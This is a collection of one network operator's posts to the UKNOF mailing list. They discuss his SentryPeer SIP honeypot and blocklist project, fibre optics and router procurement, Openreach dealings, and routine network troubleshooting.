[uknof] SentryPeerHQ

[Gavin Henry]

Hi all,

I've just released https://sentrypeer.com which some of you might find
useful:

About SentryPeerHQ -> https://sentrypeer.com/about

Fully Open Source -> https://github.com/SentryPeer/SentryPeerHQ

Always free -> https://sentrypeer.com/pricing (for those that contribute
data by running an official SentryPeer node or their own honeypot)

Thanks,
Gavin.

Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

Hi all,

Come a long way since Nov:

https://github.com/SentryPeer/SentryPeer/releases/tag/v1.4.0

Peer to peer bad_actor replication is now released. Deutsche Telekom
"T-Pot - The All In One Honeypot Platform" included SentryPeer
(https://github.com/telekom-security/tpotce/tree/22.x) and Kali Linux
is coming - https://bugs.kali.org/view.php?id=7523#c15939

Would love to have some testers onboard!

Thanks,
Gavin.

Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

> > https://github.com/SentryPeer/SentryPeer
>
> I haven't delved into the p2p protocol side of things, but as a long
> time C programmer I'd be extremely wary of starting a large new project
> with it. Especially one that is designed to be exposed to attackers. An
> opportunity to learn Go or Rust perhaps?

Hi Jonathan,

I had quite bad analysis paralysis for exactly that reason. I know Go and
have just recorded a show for SE Radio (
https://www.se-radio.net/team/gavin-henry/) with Tim about Rust (Tim's book
- https://www.manning.com/books/rust-in-action ). I thought about both, and
looked at the state of the SIP libraries, Peer to Peer libs and BGP ones.
Rust seems to be suffering with Mozilla re-work and now:

"The entire moderation team resigns, effective immediately. This
resignation is done in protest of the Core Team placing themselves
unaccountable to anyone but themselves." - 4 days ago
https://github.com/rust-lang/team/pull/671

The libp2p looked great too for Go and Rust - https://libp2p.io/ but
there's one company behind it https://protocol.ai/ and I really enjoyed
this https://zguide.zeromq.org/docs/chapter8/

I'd also looked at Elixir, but various things I wanted to achieve kept
pulling me back to C. I enjoyed recording this with Jens too
https://www.se-radio.net/2020/06/episode-414-jens-gustedt-on-modern-c/ and
am speaking to Robert Seacord on Secure Coding in C (
https://en.wikipedia.org/wiki/Robert_C._Seacord) next month and Daniel who
created curl after that. curl is 25 years old. Go isn't. Rust is 5 or so.
I'm sure everyone here has been burnt by framework X going away. C won't.

My goal is longevity and pretty much what I say in the README.md -
https://github.com/SentryPeer/SentryPeer/blob/main/README.md

"I started this because I wanted to do C network programming as all the
projects I use daily are in C like PostgreSQL, OpenLDAP, FreeSWITCH,
OpenSIPS, Asterisk etc. See Episode 414: Jens Gustedt on Modern C for why C
is a good choice."

and so far, it's been the right choice for examples I'm following, books I
have and places this project can run and be built. And honestly, I like the
level of control and minutiae. But, the prototype of SentryPeer was done in
a few days...(https://github.com/SentryPeer/SentryPeer/tree/main/prototype).
Once I had made the decision, it felt right and I cracked on.

Lastly, I think you can still write unsafe code in C, but with the IDE you
use, CI/CD (https://github.com/SentryPeer/SentryPeer/actions) and all the
scanning tools, you should catch most things. It's easy to write unsafe
Rust or Go too -
https://www.computer.org/csdl/proceedings-article/icse/2020/712100a234/1pK5e6OTqJa
We talk about this in the upcoming Rust show.

Not all of SentryPeer has to be in C. I think there's a place for C, Go and
Rust in this or whatever, but I wanted to use C and that's the option you
get when you start something. Choices, warts and all :-)

Remember, most of the problem spaces discussed in this email thread have
nothing to do with Cyet

Thanks,
Gavin.

Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

> > Maybe we can submit our HP data to your API
>
> I think having a way to side load data would be amazing once a
> spec/schema has been done. Ideas?

The SQL schema is basic :-)

https://github.com/SentryPeer/SentryPeer/blob/main/src/database.c#L11

Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

> Hello

Hi Leo!

> We built the same!

Awesome. Code to share?

> Maybe we can submit our HP data to your API

I think having a way to side load data would be amazing once a
spec/schema has been done. Ideas?

> good stuff

Thanks for reading :-)

> Leo

Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

> This looks like a neat project and it is great that you've open sourced it. I 
> can see how it would be useful for folks that want an open source solution to 
> deploy their own honeypots and feed that back into private blocklists.

Thanks Rob.

> On a wider, shared blocklist level, this seems like a relatively simple 
> problem to solve, but the parallels with email spam are hard to avoid.

I know. Especially the p2p part.

> There have been a few similar blocklists including the ITSPA/Comms Council 
> Cargill & Cox DNS based project whose name temporarily escapes my braincells, 
> and the apiban project (Fred Posner - Kamailio, LOD) which seems to be 
> gaining some traction.

snitch, but that is a passive pcap tool. I wanted batteries included.

yep, I like APIBAN, but all the data sits there. It is free and
centralised. Clients are open source. No phone numbers.

> I guess the feature of your project is the open federation protocol, but I 
> think there are reasons that most approaches to this kind of filtering are 
> behind a curtain controlled by gatekeeper and Matthew covered most of them. 
> There is a very high trust bar for most providers to import filtering 
> decisions into their network, and I can't think of any non-curated approach 
> that has ever flown.
>

There are much smarter people than me that will have solved this I'm
sure. I think it's the "rules based" approach, vs ML approach etc. I
just want to get the data in folks hands and I think the filtering
part will solve itself.

> It will be interesting to see how this pans out though, certainly looks like 
> a great learning and data collection project.

That's why I've started it. I've already learned a ton! Packaging it for one!

Re: [uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

>> Working on the API and web UI next, then the p2p part of it. Feel free
>> to submit any feature requests or have a play :-)
>

Hi Matthew,

Thank you very much for your reply and time spent thinking about all
of the below. Much appreciated!

> P2P sounds ripe for abuse by bad actors... A few scenarios:

That's correct. I think the authz/authn issues have already been
solved in other places. I'm thinking about things like signing up on
StackOverflow or Reddit and what you can do the first time without any
reputation etc. Similar to email. I was chatting to Justin Richer
(https://www.se-radio.net/2019/08/episode-376-justin-richer-on-api-security-with-oauth-2/)
about this last month:

"I took a look at the peer project and it sounds interesting. A lot
like BitTorrent’s protocol, but with the sharing at a higher level, it
seems? So it might be worthwhile researching into how graph networks
like that determine trustworthiness of nodes. Most of them have a kind
of distributed consensus state that gets reached after some time, and
so there’s no client authentication needed within the network itself
because the clients will be identified by some ephemeral key and
trusted based on actions instead of a pre-registration.

Still, there are a few different efforts that are dealing with
bridging registration type questions in the OAuth and related spaces.
OAuth 2 assumes clients all have client IDs and they’re
pre-registered. The Dynamic Registration spec (RFC7591) allows that
registration to happen programmatically as a discrete pre-step, but it
also allows the client to present a signed assertion (the software
statement) that helps the client claim that it is legitimate. An
extension to OpenID Connect recently introduced the idea of the client
sending a “registration” object with the initial request to the AS, to
provide a drive-by registration in a single step. The client would get
a client ID out the other end if it’s successful. I haven’t seen this
applied in practice anywhere yet. The OpenID SIOP group has been
discussing overloading the Client ID parameter itself to contain
semantic information allowing the client to send an identifier that
the AS could use to fetch client registration information. This
subverts the idea of the client ID as understood by most
implementations (it’s now client-supplied and meaningful instead of
AS-supplied and opaque to the client). The frontrunner here is using
DIDs and DID documents to convey stuff, but that’s mostly because
that’s the tech this crowd currently likes a lot.

In GNAP we’ve inverted the registration requirement a bit — the
protocol’s set up to assume that you’re coming in with no previous
registration, so you can send any client information necessary during
the initial request, and that initial request always happens the same
way regardless of how the interactions and other next steps go. But
there’s an optimization for cases when you :do: have a pre-registered
client, so that you can send the ID instead of the client info itself.

I’m not sure how much of that actually applies to what you’re working
on, based on my very limited understanding of what you’re doing, but I
hope it’s helpful. Good luck with the project!"

> 1. You only get the list if you provide a list of your own. Therefore, 
> someone adds some random IPs into a list, then knows what the state of the 
> network is, and as soon as the IP they're using appears on the list, they 
> stop using it until it drops back off.

True. The IP address harvesting is one thing, but stage two when they
actively try to make phone calls will always happen as it's too
lucrative not to. That's the data I'm also interested in getting and
sharing. Folks that run the nodes will be able to add their own phone
number allocations and I'm thinking about using the various RIR feeds
etc. RPKI. Again, I think this is a solved problem, I just need to
find the right place to look.

> 2. IPv6 means presumably blocking /64s at a time rather than individual 
> addresses, I don't know if privacy addressing etc is a thing in the telephony 
> market, where addresses rotate after a while?

Not sure yet.

> 3. CGNAT means you might affect more than you intended, and the problem will 
> only get worse over time.

How is this currently handled with an infected PC behind CGNAT? That's
a solved problem?

> 4. If the source IP is just a compromised device, you've booted that person 
> (who may be an entire office) off SIP for a week or more, even if they fix 
> the issue.

You don't need to block them, but depending on what the ITSP wants to
do, they could get limited service etc.

> Additionally, from a feature POV:
>
> 1. BGP sounds like a needless over-complication. Surely just some iptables 
> (realistically: nftables) hooks would do?

Both. Depends on how you run your nodes. The BGP part I just like the
thought of and want to explore.

> 2. A user is never going to pay for all data collected if it's available via 
> P2P, and if it 

[uknof] SentryPeer: A distributed peer to peer list of bad IP addresses and phone numbers collected via a SIP Honeypot

[Gavin Henry]

Hi all,

I hope you don't mind the post, but thought this might be of use and
in the spirit of release early, release often I've done an alpha
release:

https://github.com/SentryPeer/SentryPeer

There's a presentation too if you'd like to watch/read where I hope to
go with this:

https://blog.tadsummit.com/2021/11/17/sentrypeer/

Working on the API and web UI next, then the p2p part of it. Feel free
to submit any feature requests or have a play :-)

Thanks for reading and any feedback is welcome!

-- 
Kind Regards,
Gavin Henry.

-- 
Kind Regards,
Gavin Henry.

Re: [uknof] ADVA optic

[Gavin Henry]

Thanks all. Adva got back to me and sent one direct via Sol Distribution.
£48 inc vat and del.

On Wed, 9 Dec 2020 at 22:28, David Croft  wrote:

> Adva don't sell direct, try Infradata https://www.infradata.co.uk/
>
> David
>
> On Sun, 29 Nov 2020 at 14:54, Gavin Henry  wrote:
> >
> > Hi all,
> >
> > Long story short, an optic in a OR supplied GE102Pro (H)
> > (fsp-150-ge-100-pro) has been swapped and doesn't work (we didn't find
> > out for ages that it's an LX one). We've taken one from a unit not yet
> > live in the same rack, but need to get a replacement. OR will charge a
> > site visit etc. (so I'm told), so I just want to get a replacement. As
> > seen in the picture attached it's a:
> >
> > adva sfp/gbe/850i/mm/lc 0061003006
> >
> > I was looking at this, but Flexoptix can't key the same type and
> > suggest a generic one:
> >
> >
> https://www.flexoptix.net/en/sfp-sx-transceiver-1-gigabit-mm-850nm-550m-7db-ddm-dom.html?co3066=18152
> >
> > and ProLabs haven't got back to me on this price:
> >
> >
> https://www.prolabs.com/products/transceivers/adva/sfp/1000base/0061003006-c
> >
> > fs.com say this will work, but it's to go direct to the customer so I
> > want to be 100% certain:
> >
> > https://www.fs.com/uk/products/75332.html
> >
> > Do ADVA sell them directly as they haven't got back to me? There's a
> > ton on eBay, but I wanted to get a new one. Any recommendations? I
> > need one by Friday 4th Dec.
> >
> > Many thanks,
> > Gavin.
>
-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 330 44 50 000
D +44 (0) 330 44 55 007
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie, Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://
pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] ADVA optic

[Gavin Henry]

Hi all,

Long story short, an optic in a OR supplied GE102Pro (H)
(fsp-150-ge-100-pro) has been swapped and doesn't work (we didn't find
out for ages that it's an LX one). We've taken one from a unit not yet
live in the same rack, but need to get a replacement. OR will charge a
site visit etc. (so I'm told), so I just want to get a replacement. As
seen in the picture attached it's a:

adva sfp/gbe/850i/mm/lc 0061003006

I was looking at this, but Flexoptix can't key the same type and
suggest a generic one:


https://www.flexoptix.net/en/sfp-sx-transceiver-1-gigabit-mm-850nm-550m-7db-ddm-dom.html?co3066=18152

and ProLabs haven't got back to me on this price:


https://www.prolabs.com/products/transceivers/adva/sfp/1000base/0061003006-c

fs.com say this will work, but it's to go direct to the customer so I
want to be 100% certain:

https://www.fs.com/uk/products/75332.html

Do ADVA sell them directly as they haven't got back to me? There's a
ton on eBay, but I wanted to get a new one. Any recommendations? I
need one by Friday 4th Dec.

Many thanks,
Gavin.

Re: [uknof] ADVA optic

[Gavin Henry]

Apologies, resent without image attachment in case it got blocked.

Thanks.

Re: [uknof] 4G routers that can be centrally managed

[Gavin Henry]

>
> Thanks. Mostly Mikrotik recommendations at the moment. Will take a look at
those too.

>

Re: [uknof] 4G routers that can be centrally managed

[Gavin Henry]

Thanks for the MikroTik recommendations.

[uknof] 4G routers that can be centrally managed

[Gavin Henry]

Hi all,

I'm looking for recommendations of low cost routers with a bit of
management.

I'm not sure if these should be ubnt or meraki style with 4G exit points or
all SIM enabled, or regular routers with a dongle.

It's part of an Aberdeen City Digital Inclusion programme (hence extremely
lost cost where broadband just isn't affordable) but could be part of the
Scottish Government lead ‘No One Left Behind in a Digital Scotland’
programme too.

Thanks,
Gavin.

-- 
Kind Regards,

Gavin Henry.
https://www.surevoip.co.uk

Re: [uknof] COVID-19 offers of help and network changes

[Gavin Henry]

Sounds good to me.

Re: [uknof] COVID-19 offers of help and network changes

[Gavin Henry]

> Reminds me (in a another life) of giving transit to a few folks who lost out 
> during 9/11 for free - Fantastic that you guys are offering this free! Well 
> done!

We're a community here, as you know. I haven't been able to get to a
UKNOF or LINX/LONAP face to face for a long time now as my son Ben (a
bit about me and Ben - https://www.bbc.co.uk/programmes/p06rqp6c ) is
disabled and it's near impossible to do overnights.

This email was the only thing I could think of to show my support to
everyone - sharing knowledge.

Gavin.

Re: [uknof] COVID-19 offers of help and network changes

[Gavin Henry]

> Bravo, Gavin,

Thanks!

> I’m just about to write to my customers offering the same thing.
>
> As a return, we do firewalls, networks (Enterprise or SP) and IPT.

I'm putting out an email tomorrow to customers, partners and resellers
as the amount of emails today from folks that don't realise they can
just unplug their desk phone and plug it in at home. Of course, there
will be those that just sell them new ones of softphones, but still. A
bit of friendly free education will go along way.

Gavin.

[uknof] COVID-19 offers of help and network changes

[Gavin Henry]

Hi all,

We're a small company of 7. 4 of us are now working from home, others
to decide, but the option is there.

I know everyone is probably extremely VoIP savvy, but if any one needs
any help or advice about setups at home etc. feel free to reply here
of off-list.

If there's anything else I can help with, albeit being a small network
operator, just let me know.

Has anyone seen any big demands yet? I've been following NANOG and the
Italian graphs.

Thanks,
Gavin.

-- 
Kind Regards,

Gavin Henry.
Managing Director.
SureVoIP - https://surevoip.co.uk

Re: [uknof] why aren't we giving /31 to customers

[Gavin Henry]

No idea.

Our leased line/ethernet customers get a /31. CPE are Juniper SRXs, some
Mikrotik using that /32 hack or just DrayTek. No problems.

Then we charge extra for more IPv4. IPv6 comes with it.

Re: [uknof] Ubnt and iOS 12 help

[Gavin Henry]

Hi all,

Forgot to follow up on this for others. You were all right!!!

Needed:

set security flow tcp-mss all-tcp miss 1350

to reduce TCP MISS from what we had for most setups which was 1438.

https://blog.apnic.net/2014/12/15/ip-mtu-and-tcp-mss-missmatch-an-evil-for-network-performance/

Cheers.

Re: [uknof] Getting rid of old kit

[Gavin Henry]

>
> If you don't need BGP and can live with static routes, it's a good box.
>
> Mark.
>

The mx204?

>

Re: [uknof] Getting rid of old kit

[Gavin Henry]

On Wed, 6 Nov 2019 at 14:40, James Bensley  wrote:
>
> On Wed, 6 Nov 2019 at 14:10, Gavin Henry  wrote:
> > I think there
> > are folks that buy old Juniper kit for resale?
>
> Yes, Juniper ;) Although, that is usually as part of a new purchase,
> they don't just buy old Juniper kit for nothing.
>
> Seriously though, following Job's suggestion of a hackerspace, if you
> want to donate them you could reach out to NetNI/NetMcr/NetLnd and see
> if they have any young network engineers that could use them for a
> home lab / cert training.

I'll add that to my options list. Thanks all for the suggestion.

Re: [uknof] Getting rid of old kit

[Gavin Henry]

Hi Job,

Thanks. Yeah, I agree. I'd like someone to use them since they cost a
bomb in 2013. We're just using them mainly for VoIP traffic and a
handful of ethernet and FTTC supporting circuits, but we've just won a
chunk of new business which will pay for our upgrade.

Gavin.

Re: [uknof] Ubnt and iOS 12 help

[Gavin Henry]

I'll also add that we watch it pick up via DHCP and hit our website
and DNS servers, but then started to timeout on the redirect. So it's
getting out OK like the rest of non-iOS devices. MTU does seem to fit.

Re: [uknof] Ubnt and iOS 12 help

[Gavin Henry]

> On Tue, 17 Sep 2019, 16:29 Dan Kitchen,  wrote:
>>
>> Sounds like an MTU issue to me.
>
>
> +1
> Possibly coupled with high packet loss
>
> I've had a few people come to me recently with Wi-Fi problems on devices, and 
> they're on 2.4GHz Wi-Fi and using Bluetooth. Turning off Bluetooth or 
> switching to 5GHz Wi-Fi improves things drastically. My guess is that newer 
> chips share the 2.4G radio rx/tx and don't do a very good job.
>

Hi all,

So we tried bluetooth off. No luck. Bought a new 5GHz -
https://www.ui.com/unifi/unifi-ap-ac-lite/ with cloud key and it
didn't work. They took that home and tested on a Sky router and it
worked with the same iPhone (awaiting make/model and settings).

Seems to be our network then. Where this works on my own set up, it is
BTW FTTC. This set up is via our TTB FTTC links, same MTU though of
1492 for all FTTC links.

I'm going tomorrow with an iPhone 8 with the new iOS 13.1 on it to
test that has never seen this network. There is a pair of SRX220H2s
there and at home is a SRX100H2, same settings and controller versions
and disc firmwares. No URL filtering or anything like a Juniper KB
points to:

https://kb.juniper.net/InfoCenter/index?page=content=KB29239

Any other ideas? Will report back.

Thanks,
Gavin.

Re: [uknof] BT/EE and Vodafone - why the split?

[Gavin Henry]

>
>
>
> > "kicked [them] off their network" in what context of network?
>
> https://aastatus.net/27798 - this will relate to the EU SIP2SIM cards
> which use Vodafone NL.
>

We don't use that service, but that's the only public link I could find. I
think that's a Manx service.

But yeah...

>

Re: [uknof] BT/EE and Vodafone - why the split?

[Gavin Henry]

You can see more here:

https://aastatus.net/27798

"

We're sorry for the short notice, but we've been given short notice. The
reason for this is due to an ongoing commercial dispute between Vodaphone
Group and EE UK."

Re: [uknof] BT/EE and Vodafone - why the split?

[Gavin Henry]

Hi Neil/Tom,

In regards to roaming agreements. Vodafone isn't allowed to roam on to the
EE network anymore since a week ago today at 5pm. I'm trying to learn more.

Thanks.

On Fri, 8 Feb 2019 at 06:36, Neil J. McRae  wrote:

> EE is just a brand so not sure what you mean - kicked them off?
>
> Regards,
> Neil.
>
> Sent from my iPhone
>
> On 7 Feb 2019, at 22:31, Gavin Henry  wrote:
>
> Hi all,
>
> Does anyone have an insight as to why EE kicked Vodafone off their network
> last Friday at 5pm?
>
> Thanks,
>
> --
> Kind Regards,
> Gavin Henry.
> https://surevoip.co.uk
>
>

-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 330 44 50 000
D +44 (0) 330 44 55 007
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie, Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from hkp://
pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] BT/EE and Vodafone - why the split?

[Gavin Henry]

Hi all,

Does anyone have an insight as to why EE kicked Vodafone off their network
last Friday at 5pm?

Thanks,

-- 
Kind Regards,
Gavin Henry.
https://surevoip.co.uk

Re: [uknof] Internet Instability between 11:01 - 11:13 GMT?

[Gavin Henry]

> Dear Giles,
>
> On Tue, Feb 05, 2019 at 12:12:58PM +, Giles Coochey wrote:
> > We saw a blip with our peering with AS61231 (SSE), anyone else
> > experience any BGP strangeness around 11:01 - 11:13 GMT today?
>
> I've heard quite some people report that their EBGP sessions with Level3
> / AS 3356 flapped around that time. You may have seen second order
> effects from such instability?
>
> I don't have more details.

We saw our Level3 BGP sessions go down in Telehouse East.

Re: [uknof] OpenReach CP Customer Establishement

[Gavin Henry]

Good luck Leigh.  We’re a long-standing Wholesale Partner who also wanted
to use Openreach services, so tried the establishment process. Openreach
wouldn’t even return our calls. It’s over two years now (yes, really) of
chasing and emails ignored, phone calls not returned, so zero progress.

Same here. We took years for WLR3 and almost the same for our SS7
interconnects, but to be honest most delays were our side not following the
massive documentation process.

Only advice would be to get your account managers name address and (home
phone number) and do everything in a timely fashion. I did have to complain
a lot though about slowness to move things forward at the start.

Gavin.

Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP

[Gavin Henry]

On 20 March 2017 at 10:28, Stuart Henderson  wrote:
>>  Original message 
>> From: Jack Kay 
>>
>> Maplins appear to sell patch leads but no optics.. helpful.
>
> On 2017/03/20 09:13, Peter Knapp wrote:
>> You cant really expect them to sell sfps though given branded
>> manufacturers are all device coded (including Advas)
>
> Maybe flexoptix could do a deal with them :)
>

Yeah, that's what we use on our Junipers too.

Why not have the copper SFP as a default, or have the ethernet live
(need to check the ADVA model, it's probably only 100mb/s) and leave
it to the customer to swap it if they need a longer run? Normally the
rj45 sfp cost more though, so that will be why no doubt.

Thanks.

Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP

[Gavin Henry]

Evening,

Well, the layer 2 provider into us is SSE and the tail is Openreach.
For a "small fee" SSE are arriving tomorrow with an SFP and patch
lead.

Sorted. Thanks all!

Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP

[Gavin Henry]

On 18 Mar 2017 17:46, "Neil J. McRae" <n...@domino.org> wrote:

Is it a 1G circuit ?


Yeah, all cleared up (see my earlier reply).

Sent from my iPhone

> On 18 Mar 2017, at 17:23, Gavin Henry <ghe...@suretec.co.uk> wrote:
>
> Hi all,
>
> OR didn't deliver RJ45 presentation like requested and our customer is
> trying to get this up at the weekend
>
> Anyone based round Arlington Business Park, Stevenage with some?
>
> Thanks.
>
> --
> Kind Regards,
> Gavin Henry.
> 

Re: [uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP

[Gavin Henry]

Hi Simon,

Yeah, it is. I've double checked our provisioning ticket and carrier order.
It's all clear that it's an SM fibre end at the NTE and the customer was
informed and accepted.

Sorry for the OR comment, the carrier got my hopes up saying ethernet was
requested but not delivered and they raised a fault.

So, customer needs an sfp and patch lead by Monday...hmmm..why do they do
this at weekends and not tell you so you can advise.

Thanks.


On 18 Mar 2017 17:41, "Simon Lockhart" <si...@slimey.org> wrote:

On Sat Mar 18, 2017 at 05:14:40PM +0000, Gavin Henry wrote:
> OR didn't deliver RJ45 presentation like requested and our customer is
> trying to get this up at the weekend

If it's GigE presentation on an EAD, then fibre is the only choice. You can
choose between multimode and singlemode, though :)

Simon

[uknof] Single Mode SFP with fibre patch lead anyone at or around postcode SG12FP

[Gavin Henry]

Hi all,

OR didn't deliver RJ45 presentation like requested and our customer is
trying to get this up at the weekend

Anyone based round Arlington Business Park, Stevenage with some?

Thanks.

-- 
Kind Regards,
Gavin Henry.

[uknof] Looking Glass

[Gavin Henry]

Morning all,

Does anyone have any recommendations for a decent open source software
looking glass project they have used?

Thanks.

-- 
Kind Regards,
Gavin Henry.

Re: [uknof] Jon Boyer or Jon Blank - ipv4hosting.com

[Gavin Henry]

On 19 Sep 2016 22:13, "Hal ponton"  wrote:
>
> They've emailed everyone of our addresses so far today abuse / webmaster
/ lir you name it.
> --

And their unsubscribe is a non-mailinglist email. Yeah, sure.

Thanks.

[uknof] Jon Boyer or Jon Blank - ipv4hosting.com

[Gavin Henry]

Evening all,

If anyone knows either of these, tell them to go away!

Anybody else had 3 emails from them today?

-- 
Kind Regards,

Gavin Henry.

Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] Multi-tenant PBX Solution

[Gavin Henry]

> However, it's worth noting that if you're going to be using Asterisk and
selling the product to your customers who will in turn rely solely on your
product for telephony, you need to make sure you're very aware and up to
speed on the legal aspects.
>

I would replace the word Asterisk with the words "software based product"
in the above paragraph.

> From what I've seen implemented, read up on and inevitably replaced, it's
incredibly difficult to build a solution using Asterisk that would be able
to survive the test of general condition 4.[2]
>

^^^ This applies to any software stack solution. It is your own due
diligence to test and adopt any solution. Whether it's Asterisk or not. It
is fair to say that there have a lot of bad Asterisk solutions out there,
but it's not supposed to be used for everything. It's usually provided as
the A in a LAMP stack but there's so much more needed if selling a landline
replacement service, as Richard points out.

> Forget the shiny web UI, the billing interfaces, systems operations, etc;
if you can't maintain an call and lose half your network, you're setting
yourself up for a number of very big (and potentially expensive) headaches.
>

Again, not specific to Asterisk or its known weaknesses -
http://mcfunley.com/choose-boring-technology

I'm the opposite. Asterisk has its place and should only be bashed when
you've experienced it. I think Richard has experienced it though :)

Gavin.

--
Kind Regards,

Gavin Henry.
Managing Director.

Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

Re: [uknof] Multi-tenant PBX Solution

[Gavin Henry]

Hi Paul,

Have a look at the voiceops mailing list. There was a big thread this year
about this. Usually one every year. Depends on your requirements re
proprietary software and/or open source stacks.

Interesting reading though, with lots of options.

Thanks.

[uknof] SeaMeWe-3 owners

[Gavin Henry]

Hi,

If you are from any of the following companies, can you contact me
offlist for a quote regarding a customer we have that is coming in to
us on this cable:

Orange
BT
Eircom
Sri Lanka Telecom
Tata Communications
Verizon
Sprint
Vodafone
Deutsche Telecom

Thanks muchly!

-- 
Kind Regards,

Gavin Henry.
Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] WLR3 BTOR TPI companies

[Gavin Henry]

Evening all,

I presume some of you will be using one of these:


Choosing a Third Party Integrator (TPI) :

The following is a list of operationally active TPIs who have an
approved and working WLR3 interface solution with Openreach.  They
have brought customers through the WLR3 product establishment process:

* Aurora Kendrick James - www.aurorakendrickjames.com ; www.akjl.co.uk
* General Dynamics (previously known as Vangent Ltd) -  www.gdit.com
* Kofax Limited (previously known as Singularity) - www.kofax.com
* Strategic Imperatives - www.imperatives.co.uk
* Union Street Technology - www.unionstreet.uk.com  ]


Any to avoid? I also remember my email about doing an OSS integration
last year.

Thanks.

-- 
Kind Regards,

Gavin Henry.
Managing Director.

T +44 (0) 330 44 50 000
D +44 (0) 330 44 55 007
M +44 (0) 7930 323266
F +44 (0) 1224 824887
E ghe...@suretec.co.uk

Open Source. Open Solutions(tm).

http://www.suretecsystems.com/

Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

Suretec Systems is a limited company registered in Scotland. Registered
number: SC258005. Registered office: 24 Cormack Park, Rothienorman,
Inverurie, Aberdeenshire, AB51 8GL.

Subject to disclaimer at http://www.suretecgroup.com/disclaimer.html

Do you know we have our own VoIP provider called SureVoIP? See
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] StackStorm

[Gavin Henry]

Anyone using or playing with this?

https://stackstorm.com/

Going to take a look, but we have all the bits underneath already. Will see
how crippled they're base version is.

Usual "it's open source" model maybe.

Thanks.

--
Kind Regards,
Gavin Henry.

[uknof] Junos license changes

[Gavin Henry]

Evening all,

I suppose old news, but then I can't find anything online about the change
from a quick Google. Had a meeting with our Juniper account manager today
and have learned the new SRX range, at least, now come with only firewall
features and other "basic" things for the same price as the old range.

You now have to pay a licence fee for things like MPLS and Junos is no
longer licensed to the hardware. The coming of whitebox networking to the
rest of the Juniper range and not just the vXX and OCX range (
http://www.juniper.net/uk/en/products-services/switching/ocx1100/)??

I'm sure they'll make tons from the "Certified for Junos" model like Red
Hat etc.

Gavin.

--
Kind Regards,
Gavin Henry.

Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

Re: [uknof] Copper ethernet for OoB in Telehouse East

[Gavin Henry]

Hi all,

All sorted now. Thanks.

-- 
Kind Regards,
Gavin Henry.

Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

[uknof] Copper ethernet for OoB in Telehouse East

[Gavin Henry]

Hi all,

Can anyone offer me something? Nothing fancy. We're in TFM61 M07.
Happy to reciprocate.

Thanks.

-- 
Kind Regards,

Gavin Henry.

Winner of the Best Business ITSP (Medium Enterprise) 2016!
http://www.surevoip.co.uk/2016-best-provider

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] FTTC Wires only

[Gavin Henry]

> Haven’t tried it yet, but the Draytek Vigor 130 should do the same job - 
> transparent Ethernet/VDSL bridge.  They might be a bit more expensive, but as 
> a UK company, they may be sympathetic to the plight - and also keen to plug 
> the gap in the market and clean-up in the process.
>

We use these for our customers (business customers) with great
success. I run one at home too via a Juniper SRX100 on FTTC full
80/20. Works nice with our VoIP.

-- 
Kind Regards,

Gavin Henry.
http://www.surevoip.co.uk

OpenPGP (GPG/PGP) Public Key: 0x8CFBA8E6 - Import from
hkp://pool.subkeys.pgp.net
or http://www.suretecgroup.com/0x8CFBA8E6.gpg

Re: [uknof] BGP configuration best practices from ANSSI and others

[Gavin Henry]

